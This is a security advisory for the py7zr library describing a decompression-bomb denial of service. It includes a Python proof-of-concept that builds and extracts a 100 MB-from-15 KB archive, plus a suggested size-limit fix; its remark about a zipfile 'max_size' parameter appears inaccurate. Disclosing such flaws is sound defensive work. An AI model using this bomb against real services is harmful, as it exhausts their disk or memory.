GHSA-gjrg-mpp7-g774Medium

py7zr: Decompression bomb (zip bomb) denial of service via unchecked extraction size

Published
June 19, 2026
Last Modified
June 19, 2026

🔗 CVE IDs covered (1)

📋 Description

py7zr's Worker.decompress() extracts archive entries without tracking total decompressed size. A crafted .7z file can exhaust disk or memory before the extraction completes.

Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio).

Proof of concept:

import py7zr, tempfile, os

# create bomb: compress 100MB of zeros into ~15KB
bomb_path = tempfile.mktemp(suffix='.7z')
with py7zr.SevenZipFile(bomb_path, 'w') as z:
    import io
    z.writef(io.BytesIO(b'\x00' * 100 * 1024 * 1024), 'bomb.bin')

print(f'archive size: {os.path.getsize(bomb_path):,} bytes')

# extract — no size check
with py7zr.SevenZipFile(bomb_path, 'r') as z:
    z.extractall(path=tempfile.mkdtemp())

print('extracted 100 MB from ~15 KB archive')

Root cause: Worker.decompress() in py7zr/worker.py writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python's zipfile max_size parameter.

Fix: track cumulative decompressed bytes and raise before writing if a limit is exceeded:

MAX_EXTRACT_SIZE = 2 * 1024 ** 3  # 2 GB default, configurable

total = 0
for chunk in decompressed_chunks:
    total += len(chunk)
    if total > MAX_EXTRACT_SIZE:
        raise py7zr.exceptions.DecompressionBombError(
            f'Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes'
        )
    outfile.write(chunk)

Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.

🎯 Affected products1

  • pip/py7zr:<= 1.1.2

🔗 References (3)